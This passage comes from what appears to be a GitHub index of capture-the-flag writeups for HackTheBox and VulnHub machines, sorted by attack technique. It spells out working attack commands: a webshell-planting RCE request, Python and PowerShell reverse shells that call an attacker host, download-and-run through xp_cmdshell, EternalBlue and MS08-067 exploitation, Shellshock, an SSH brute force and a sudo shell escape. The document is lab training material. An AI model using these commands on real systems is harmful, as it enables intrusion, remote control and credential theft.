src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/killchain.png" width="100" height="100" /> | [`enumerate_proto_ftp`](https://github.com/7h3rAm/writeups#enumerate_proto_ftp), [`enumerate_proto_ssh`](https://github.com/7h3rAm/writeups#enumerate_proto_ssh), [`exploit_ssh_bruteforce`](https://github.com/7h3rAm/writeups#exploit_ssh_bruteforce), [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin_hellodolly`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_hellodolly), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | --- <a name="exploit_php_webshell"></a> #### exploit_php_webshell [⇡](#exploit) use the php web shell to execute arbitrary commands and gain interactive access on the target system | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Misdirection: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.misdirection1/writeup.pdf) | [vh#371](https://www.vulnhub.com/entry/misdirection-1,371/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.misdirection1/killchain.png" width="100" height="100" /> | [`exploit_php_webshell`](https://github.com/7h3rAm/writeups#exploit_php_webshell), [`exploit_bash_reverseshell`](https://github.com/7h3rAm/writeups#exploit_bash_reverseshell), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers), [`privesc_passwd_writable`](https://github.com/7h3rAm/writeups#privesc_passwd_writable) | --- <a name="exploit_phptax"></a> #### exploit_phptax [⇡](#exploit) the `Phptax 0.8` web application is vulnerable to remote code execution ```shell GET /phptax/index.php?field=rce.php&newvalue=%3C%3Fphp%20passthru(%24_GET%5Bcmd%5D)%3B%3F%3E HTTP/1.1 Host: <targetip>:<targetport> User-Agent: Mozilla/4.0 (X11; Linux i686; rv:60.0) Gecko/20100101 Firefox/60.0 GET /phptax/data/rce.php?cmd=uname%20-a HTTP/1.1 Host: <targetip>:<targetport> ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Kioptrix: 2014 (#5)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix5/writeup.pdf) | [vh#62](https://www.vulnhub.com/entry/kioptrix-2014-5,62/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix5/killchain.png" width="100" height="100" /> | [`exploit_pchart`](https://github.com/7h3rAm/writeups#exploit_pchart), [`exploit_phptax`](https://github.com/7h3rAm/writeups#exploit_phptax), [`privesc_freebsd`](https://github.com/7h3rAm/writeups#privesc_freebsd) | [+] https://www.exploit-db.com/exploits/25849 --- <a name="exploit_prtg_sensors"></a> #### exploit_prtg_sensors [⇡](#exploit) execute a reverse shell command through prtg sensor creation dialog and play it to get interactive access on the target system ```shell ./46527.sh -u http://<targetip> -c "<prtg session cookie>" psexec.py pentest@10.10.10.152 ``` [+] https://www.exploit-db.com/exploits/46527 [+] https://nvd.nist.gov/vuln/detail/CVE-2018-9276 [+] https://hipotermia.pw/htb/netmon [+] https://snowscan.io/htb-writeup-netmon/# --- <a name="exploit_psexec_login"></a> #### exploit_psexec_login [⇡](#exploit) If credentials for a non-administrative user are available, we can use `psexec.py` to connect and gain interactive access to the target system. ```shell psexec <username>@<targetip> ``` --- <a name="exploit_python_reverseshell"></a> #### exploit_python_reverseshell [⇡](#exploit) use a python reverse shell to gain interactive access on the target system ```shell nc -nlvp 9999 http://<targetip>/shell.php?cmd=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<attackerip>",<attackerport>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Bashed](https://github.com/7h3rAm/writeups/blob/master/htb.bashed/writeup.pdf) | [htb#118](https://www.hackthebox.eu/home/machines/profile/118) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.bashed/killchain.png" width="100" height="100" /> | [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_python_reverseshell`](https://github.com/7h3rAm/writeups#exploit_python_reverseshell), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo), [`privesc_cron_rootjobs`](https://github.com/7h3rAm/writeups#privesc_cron_rootjobs) | | 2. | [Escalate_Linux: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.escalatelinux/writeup.pdf) | [vh#323](https://www.vulnhub.com/entry/escalate_linux-1,323/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.escalatelinux/killchain.png" width="100" height="100" /> | [`exploit_python_reverseshell`](https://github.com/7h3rAm/writeups#exploit_python_reverseshell), [`privesc_mysql_creds`](https://github.com/7h3rAm/writeups#privesc_mysql_creds), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) | [+] http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet [+] https://highon.coffee/blog/reverse-shell-cheat-sheet/#python-reverse-shell --- <a name="exploit_shellshock"></a> #### exploit_shellshock [⇡](#exploit) ```shell curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" http://<targetip>/cgi-bin/user.sh nmap -sV -p- --script http-shellshock --script-args uri=/cgi-bin/bin,cmd=ls <targetip> ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Shocker](https://github.com/7h3rAm/writeups/blob/master/htb.shocker/writeup.pdf) | [htb#108](https://www.hackthebox.eu/home/machines/profile/108) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.shocker/killchain.png" width="100" height="100" /> | [`exploit_shellshock`](https://github.com/7h3rAm/writeups#exploit_shellshock), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | [+] https://zayotic.com/posts/oscp-reference/ [+] https://highon.coffee/blog/shellshock-pen-testers-lab-walkthrough/ [+] https://blog.knapsy.com/blog/2014/10/07/basic-shellshock-exploitation/ --- <a name="exploit_smb_ms08_067"></a> #### exploit_smb_ms08_067 [⇡](#exploit) (netapi exploit) for microsoft windows xp systems with open smb ports, use the [ms08-067](https://github.com/andyacer/ms08_067) metasploit module [`windows/smb/ms08_067_netapi`]() ```shell scan: nmap -v -p 139,445 --script=smb-check-vulns --script-args=unsafe=1 <targetip> msfcli auxiliary/scanner/smb/ms08_067_check rhosts=<targetip> threads=100 E manual_a: wget https://raw.githubusercontent.com/andyacer/ms08_067/master/ms08_067_2018.py msfvenom -p windows/shell_reverse_tcp LHOST=<attackerip> LPORT=<attackerport> EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x86 --platform windows nc -nlvp <attackerport> python ms08_067_2018.py <targetip> <osid> <targetport> manual_b: searchsploit ms08-067 python /usr/share/exploitdb/platforms/windows/remote/7132.py <targetip> 1 msf: use exploit/windows/smb/ms08_067_netapi set RHOST <targetip> set LHOST <attackerip> show options exploit ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Legacy](https://github.com/7h3rAm/writeups/blob/master/htb.legacy/writeup.pdf) | [htb#2](https://www.hackthebox.eu/home/machines/profile/2) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.legacy/killchain.png" width="100" height="100" /> | [`exploit_smb_ms08_067`](https://github.com/7h3rAm/writeups#exploit_smb_ms08_067) | [+] https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2008/ms08-067 [+] https://github.com/andyacer/ms08_067 [+] https://github.com/jivoi/pentest/blob/master/exploit_win/ms08-067.py [+] https://blog.rapid7.com/2014/02/03/new-ms08-067/ [+] https://0xdf.gitlab.io/2019/02/21/htb-legacy.html --- <a name="exploit_smb_ms17_010"></a> #### exploit_smb_ms17_010 [⇡](#exploit) (eternalblue exploit) for microsoft windows system with smb v1 enbaled, use the metasploit exploit `windows/smb/ms17_010_eternalblue` ```shell nmap -p 445 -script smb-check-vulns -script-args=unsafe=1 <targetip> manual: wget https://raw.githubusercontent.com/helviojunior/MS17-010/master/send_and_execute.py msfvenom -p windows/shell_reverse_tcp LHOST=<attackerip> LPORT=<attackerport> EXITFUNC=thread -f exe -a x86 --platform windows -o revshell.exe nc -nlvp <attackerport> python send_and_execute.py <targetip> revshell.exe msf: use exploit/windows/smb/ms17_010_eternalblue set RHOST <targetip> set LHOST <attackerip> show options exploit ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Blue](https://github.com/7h3rAm/writeups/blob/master/htb.blue/writeup.pdf) | [htb#51](https://www.hackthebox.eu/home/machines/profile/51) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.blue/killchain.png" width="100" height="100" /> | [`exploit_smb_ms17_010`](https://github.com/7h3rAm/writeups#exploit_smb_ms17_010) | [+] https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010 [+] https://www.rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternalblue [+] https://0xdf.gitlab.io/2019/02/21/htb-legacy.html [+] https://github.com/helviojunior/MS17-010/send_and_execute.py --- <a name="exploit_smb_nullsession"></a> #### exploit_smb_nullsession [⇡](#exploit) smb null sessions leak a lot of sensitive information about the target system. it could be useful to access open shares or to get sensitive information | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [LazySysAdmin: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/writeup.pdf) | [vh#205](https://www.vulnhub.com/entry/lazysysadmin-1,205/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_smb_nullsession`](https://github.com/7h3rAm/writeups#exploit_smb_nullsession), [`exploit_smb_web_root`](https://github.com/7h3rAm/writeups#exploit_smb_web_root), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`exploit_wordpress_template`](https://github.com/7h3rAm/writeups#exploit_wordpress_template), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo) | --- <a name="exploit_smb_usermap"></a> #### exploit_smb_usermap [⇡](#exploit) samba 3.0.0 - 3.0.25rc3 is vulnerable to remote command execution ```shell nc -nlvp <attackerport> sudo apt install python python-pip pip install --user pysmb git clone https://github.com/amriunix/CVE-2007-2447.git cd CVE-2007-2447/ python usermap_script.py <targetip> 139 <attackerip> <attackerport> ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Lame](https://github.com/7h3rAm/writeups/blob/master/htb.lame/writeup.pdf) | [htb#1](https://www.hackthebox.eu/home/machines/profile/1) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.lame/killchain.png" width="100" height="100" /> | [`exploit_smb_usermap`](https://github.com/7h3rAm/writeups#exploit_smb_usermap) | [+] https://nvd.nist.gov/vuln/detail/CVE-2007-2447 [+] https://github.com/amriunix/CVE-2007-2447 --- <a name="exploit_smb_web_root"></a> #### exploit_smb_web_root [⇡](#exploit) smb shared directory is mapped to the web server's root directory. read files to obtain sensitive information or upload a reverse shell file native to the web server and trigger it's execution to gain interactive access on the target system | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [LazySysAdmin: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/writeup.pdf) | [vh#205](https://www.vulnhub.com/entry/lazysysadmin-1,205/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_smb_nullsession`](https://github.com/7h3rAm/writeups#exploit_smb_nullsession), [`exploit_smb_web_root`](https://github.com/7h3rAm/writeups#exploit_smb_web_root), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`exploit_wordpress_template`](https://github.com/7h3rAm/writeups#exploit_wordpress_template), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo) | --- <a name="exploit_sql_login"></a> #### exploit_sql_login [⇡](#exploit) login to the target system using a sql service account ```shell mssqlclient.py -windows-auth "<username>@<targetip>" ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Archetype](https://github.com/7h3rAm/writeups/blob/master/htb.archetype/writeup.pdf) | [htb#archetype](https://www.hackthebox.eu/home/start) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.archetype/killchain.png" width="100" height="100" /> | [`enumerate_proto_smb`](https://github.com/7h3rAm/writeups#enumerate_proto_smb), [`enumerate_proto_smb_anonymous_access`](https://github.com/7h3rAm/writeups#enumerate_proto_smb_anonymous_access), [`enumerate_proto_sql`](https://github.com/7h3rAm/writeups#enumerate_proto_sql), [`enumerate_proto_sql_ssis_dtsconfig`](https://github.com/7h3rAm/writeups#enumerate_proto_sql_ssis_dtsconfig), [`exploit_sql_login`](https://github.com/7h3rAm/writeups#exploit_sql_login), [`exploit_sql_xpcmdshell`](https://github.com/7h3rAm/writeups#exploit_sql_xpcmdshell), [`enumerate_app_powershell_history`](https://github.com/7h3rAm/writeups#enumerate_app_powershell_history), [`privesc_psexec_login`](https://github.com/7h3rAm/writeups#privesc_psexec_login) | --- <a name="exploit_sql_xpcmdshell"></a> #### exploit_sql_xpcmdshell [⇡](#exploit) use the SQL xp_cmdshell method to gain command execution on the target system ```shell SELECT IS_SRVROLEMEMBER('sysadmin') ## check if current sql user has db sysadmin role, continue if true EXEC sp_configure 'Show Advanced Options', 1; reconfigure; sp_configure; EXEC sp_configure 'xp_cmdshell', 1 reconfigure; xp_cmdshell "whoami" type shell.ps1 ## create a powershell reverse shell xp_cmdshell "powershell "IEX (New-Object Net.WebClient).DownloadString(\"http://<attackerip>/shell.ps1\");" python3 -m http.server 80 ## serve the reverse shell via http ufw allow from <targetip> proto tcp to any port 80,<attackerport> ## allow incoming connection from <targetip> nc -nlvp <attackerport> ## listen for incoming reverse shell connection ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Archetype](https://github.com/7h3rAm/writeups/blob/master/htb.archetype/writeup.pdf) | [htb#archetype](https://www.hackthebox.eu/home/start) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.archetype/killchain.png" width="100" height="100" /> | [`enumerate_proto_smb`](https://github.com/7h3rAm/writeups#enumerate_proto_smb), [`enumerate_proto_smb_anonymous_access`](https://github.com/7h3rAm/writeups#enumerate_proto_smb_anonymous_access), [`enumerate_proto_sql`](https://github.com/7h3rAm/writeups#enumerate_proto_sql), [`enumerate_proto_sql_ssis_dtsconfig`](https://github.com/7h3rAm/writeups#enumerate_proto_sql_ssis_dtsconfig), [`exploit_sql_login`](https://github.com/7h3rAm/writeups#exploit_sql_login), [`exploit_sql_xpcmdshell`](https://github.com/7h3rAm/writeups#exploit_sql_xpcmdshell), [`enumerate_app_powershell_history`](https://github.com/7h3rAm/writeups#enumerate_app_powershell_history), [`privesc_psexec_login`](https://github.com/7h3rAm/writeups#privesc_psexec_login) | --- <a name="exploit_sqli"></a> #### exploit_sqli [⇡](#exploit) target system is running a webapp that's vulnerable to sql injection ```shell sqlmap -u "http://<targetip>:<targetport>/<vulnwebapp>/index.php" --batch --forms --dump ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [CronOS](https://github.com/7h3rAm/writeups/blob/master/htb.cronos/writeup.pdf) | [htb#11](https://www.hackthebox.eu/home/machines/profile/11) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.cronos/killchain.png" width="100" height="100" /> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron) | | 2. | [Lord Of The Root: 1.0.1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.lordoftheroot101/writeup.pdf) | [vh#129](https://www.vulnhub.com/entry/lord-of-the-root-101,129/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.lordoftheroot101/killchain.png" width="100" height="100" /> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`privesc_kernel_overlayfs`](https://github.com/7h3rAm/writeups#privesc_kernel_overlayfs), [`privesc_mysql_root`](https://github.com/7h3rAm/writeups#privesc_mysql_root), [`privesc_mysql_udf`](https://github.com/7h3rAm/writeups#privesc_mysql_udf) | | 3. | [Kioptrix: Level 1.3 (#4)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix4/writeup.pdf) | [vh#25](https://www.vulnhub.com/entry/kioptrix-level-13-4,25/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix4/killchain.png" width="100" height="100" /> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`privesc_shell_escape`](https://github.com/7h3rAm/writeups#privesc_shell_escape), [`privesc_mysql_root`](https://github.com/7h3rAm/writeups#privesc_mysql_root), [`privesc_mysql_udf`](https://github.com/7h3rAm/writeups#privesc_mysql_udf) | | 4. | [Kioptrix: Level 1.1 (#2)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix2/writeup.pdf) | [vh#23](https://www.vulnhub.com/entry/kioptrix-level-11-2,23/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix2/killchain.png" width="100" height="100" /> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`exploit_cmdexec`](https://github.com/7h3rAm/writeups#exploit_cmdexec), [`privesc_kernel_ipappend`](https://github.com/7h3rAm/writeups#privesc_kernel_ipappend) | --- <a name="exploit_ssh_authorizedkeys"></a> #### exploit_ssh_authorizedkeys [⇡](#exploit) if we have access to a user's `.ssh` directory, copy our `id_rsa.pub` file to `.ssh/authorized_keys` to obtain passwordless ssh access | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Lin.Security: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.linsecurity1/writeup.pdf) | [vh#244](https://www.vulnhub.com/entry/linsecurity-1,244/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.linsecurity1/killchain.png" width="100" height="100" /> | [`exploit_nfs_rw`](https://github.com/7h3rAm/writeups#exploit_nfs_rw), [`exploit_ssh_authorizedkeys`](https://github.com/7h3rAm/writeups#exploit_ssh_authorizedkeys), [`privesc_strace_setuid`](https://github.com/7h3rAm/writeups#privesc_strace_setuid), [`privesc_docker_group`](https://github.com/7h3rAm/writeups#privesc_docker_group) | | 2. | [HackLAB: Vulnix](https://github.com/7h3rAm/writeups/blob/master/vulnhub.vulnix/writeup.pdf) | [vh#48](https://www.vulnhub.com/entry/hacklab-vulnix,48/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.vulnix/killchain.png" width="100" height="100" /> | [`exploit_nfs_rw`](https://github.com/7h3rAm/writeups#exploit_nfs_rw), [`exploit_ssh_authorizedkeys`](https://github.com/7h3rAm/writeups#exploit_ssh_authorizedkeys), [`privesc_nfs_norootsquash`](https://github.com/7h3rAm/writeups#privesc_nfs_norootsquash), [`privesc_ssh_authorizedkeys`](https://github.com/7h3rAm/writeups#privesc_ssh_authorizedkeys) | --- <a name="exploit_ssh_bruteforce"></a> #### exploit_ssh_bruteforce [⇡](#exploit) use hydra to bruteforce ssh password for a know user ```shell hydra -l anne -P "/usr/share/wordlists/rockyou.txt" -e nsr -s 22 ssh://<targetip> ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [BSides Vancouver: 2018 (Workshop)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/writeup.pdf) | [vh#231](https://www.vulnhub.com/entry/bsides-vancouver-2018-workshop,231/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/killchain.png" width="100" height="100" /> | [`enumerate_proto_ftp`](https://github.com/7h3rAm/writeups#enumerate_proto_ftp), [`enumerate_proto_ssh`](https://github.com/7h3rAm/writeups#enumerate_proto_ssh), [`exploit_ssh_bruteforce`](https://github.com/7h3rAm/writeups#exploit_ssh_bruteforce), [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin_hellodolly`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_hellodolly), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | --- <a name="exploit_ssh_privatekeys"></a> #### exploit_ssh_privatekeys [⇡](#exploit) | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [InfoSec Prep: OSCP](https://github.com/7h3rAm/writeups/blob/master/vulnhub.infosecpreposcp/writeup.pdf) | [vh#508](https://www.vulnhub.com/entry/infosec-prep-oscp,508/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.infosecpreposcp/killchain.png" width="100" height="100" /> | [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_ssh_privatekeys`](https://github.com/7h3rAm/writeups#exploit_ssh_privatekeys), [`privesc_lxc_bash`](https://github.com/7h3rAm/writeups#privesc_lxc_bash) | --- <a name="exploit_ssl_heartbleed"></a> #### exploit_ssl_heartbleed [⇡](#exploit) use nmap nse script to confirm heartbleed vulnerability and then sensepost exploit to dump memory from target system ```shell nmap --script=ssl-heartbleed -p <targetport> <targetip> python $HOME/toolbox/scripts/heartbleed-poc/heartbleed-poc.py -n10 -f dump.bin <targetip> -p <targetport> strings dump.bin ``` [+] https://github.com/sensepost/heartbleed-poc --- <a name="exploit_wordpress_defaultcreds"></a> #### exploit_wordpress_defaultcreds [⇡](#exploit) target system has wordpress configured with default credentials `admin/admin` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [hackfest2016: Quaoar](https://github.com/7h3rAm/writeups/blob/master/vulnhub.quaoar/writeup.pdf) | [vh#180](https://www.vulnhub.com/entry/hackfest2016-quaoar,180/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.quaoar/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_defaultcreds`](https://github.com/7h3rAm/writeups#exploit_wordpress_defaultcreds), [`exploit_wordpress_plugin_hellodolly`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_hellodolly), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_mysql_creds`](https://github.com/7h3rAm/writeups#privesc_mysql_creds), [`privesc_credsreuse`](https://github.com/7h3rAm/writeups#privesc_credsreuse) | --- <a name="exploit_wordpress_plugin"></a> #### exploit_wordpress_plugin [⇡](#exploit) certain wordpress installations might have a `/plugins/` directory that could provide source files or leak sensitive information | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Blocky](https://github.com/7h3rAm/writeups/blob/master/htb.blocky/writeup.pdf) | [htb#48](https://www.hackthebox.eu/home/machines/profile/48) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.blocky/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | --- <a name="exploit_wordpress_plugin_activitymonitor"></a> #### exploit_wordpress_plugin_activitymonitor [⇡](#exploit) wordpress plugin `Plainview Activity Monitor` is vulnerable to remote command injection | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [DC: 6](https://github.com/7h3rAm/writeups/blob/master/vulnhub.dc6/writeup.pdf) | [vh#315](https://www.vulnhub.com/entry/dc-6,315/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.dc6/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin_activitymonitor`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_activitymonitor), [`privesc_mysql_creds`](https://github.com/7h3rAm/writeups#privesc_mysql_creds), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo), [`privesc_nmap`](https://github.com/7h3rAm/writeups#privesc_nmap) | [+] https://www.exploit-db.com/exploits/45274 --- <a name="exploit_wordpress_plugin_hellodolly"></a> #### exploit_wordpress_plugin_hellodolly [⇡](#exploit) wordpress plugin `Hello Dolly` (default on stock wp installs) file `hello.php` is modified with php reverse shell code to gain interactive access on the target system | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [hackfest2016: Quaoar](https://github.com/7h3rAm/writeups/blob/master/vulnhub.quaoar/writeup.pdf) | [vh#180](https://www.vulnhub.com/entry/hackfest2016-quaoar,180/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.quaoar/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_defaultcreds`](https://github.com/7h3rAm/writeups#exploit_wordpress_defaultcreds), [`exploit_wordpress_plugin_hellodolly`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_hellodolly), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_mysql_creds`](https://github.com/7h3rAm/writeups#privesc_mysql_creds), [`privesc_credsreuse`](https://github.com/7h3rAm/writeups#privesc_credsreuse) | | 2. | [BSides Vancouver: 2018 (Workshop)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/writeup.pdf) | [vh#231](https://www.vulnhub.com/entry/bsides-vancouver-2018-workshop,231/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/killchain.png" width="100" height="100" /> | [`enumerate_proto_ftp`](https://github.com/7h3rAm/writeups#enumerate_proto_ftp), [`enumerate_proto_ssh`](https://github.com/7h3rAm/writeups#enumerate_proto_ssh), [`exploit_ssh_bruteforce`](https://github.com/7h3rAm/writeups#exploit_ssh_bruteforce), [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin_hellodolly`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_hellodolly), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | --- <a name="exploit_wordpress_template"></a> #### exploit_wordpress_template [⇡](#exploit) edit a wordpress template file, like `404.php` and add php reverse shell code within it to gain interactive access on the target system | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [LazySysAdmin: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/writeup.pdf) | [vh#205](https://www.vulnhub.com/entry/lazysysadmin-1,205/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_smb_nullsession`](https://github.com/7h3rAm/writeups#exploit_smb_nullsession), [`exploit_smb_web_root`](https://github.com/7h3rAm/writeups#exploit_smb_web_root), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`exploit_wordpress_template`](https://github.com/7h3rAm/writeups#exploit_wordpress_template), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo) | --- <a name="privesc"></a> ### ⚙️ PrivEsc [🡑](#ttps) <a name="privesc_anansi"></a> #### privesc_anansi [⇡](#privesc) the `anansi_util` application has `sudo` privileges. use it to run manual commands and upon error run `!/bin/bash` to execute root shell ```shell sudo /home/anansi/bin/anansi_util manual cat /etc/shadow - (press RETURN) !/bin/bash ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Brainpan: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.brainpan/writeup.pdf) | [vh#51](https://www.vulnhub.com/entry/brainpan-1,51/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.brainpan/killchain.png" width="100" height="100" /> | [`exploit_bof`](https://github.com/7h3rAm/writeups#exploit_bof), [`privesc_anansi`](https://github.com/7h3rAm/writeups#privesc_anansi), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo) | --- <a name="privesc_bash_reverseshell"></a> #### 